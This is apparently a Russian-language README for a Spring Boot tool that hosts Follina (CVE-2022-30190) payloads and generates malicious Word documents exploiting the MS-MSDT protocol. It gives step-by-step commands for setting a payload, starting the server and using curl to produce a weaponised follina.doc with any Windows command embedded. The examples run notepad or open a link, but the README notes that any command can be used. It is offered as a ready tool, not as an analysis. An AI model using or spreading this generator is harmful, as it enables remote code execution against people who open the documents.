
Сервер для размещения/активации полезных нагрузок Follina и генератор вредоносных документов Word, эксплуатирующих протокол MS-MSDT. (CVE-2022-30190)
Этот репозиторий содержит простое Spring Boot приложение, которое одновременно выступает в роли сервера для размещения/активации полезных нагрузок Follina, а также в качестве генератора вредоносных документов Word, готовых к использованию в качестве векторов атаки для эксплуатации CVE-2022-30190.
Эта уязвимость заключается в удаленном выполнении кода через MSDT (Средство диагностики поддержки Microsoft Windows).
Чтобы обслуживать уникальную полезную нагрузку по вашему выбору, вам следует:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Если вы хотите изменить текущую полезную нагрузку, сначала необходимо остановить активный сервер, а затем повторить шаги после определения новой полезной нагрузки.
ПРИМЕЧАНИЕ: полезную нагрузку можно заменить любой другой командой, при условии, что ее можно выполнить через командную строку Windows.
Чтобы обслуживать полезную нагрузку на стороне клиента по вашему выбору, вам следует:
mvn spring-boot:run
cmd, например:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
В данном случае полезная нагрузка встроена в документ, и ей потребуется лишь активация путем обращения к серверу. Таким образом, вы можете иметь несколько различных полезных нагрузок, распределенных по разным документам, и вам не придется перезагружать сервер для изменения полезных нагрузок — достаточно просто сгенерировать новый документ с нужной встроенной полезной нагрузкой.
Большое спасибо John Hammond за разработку реализации на Python и за то, что поделился своим анализом CVE.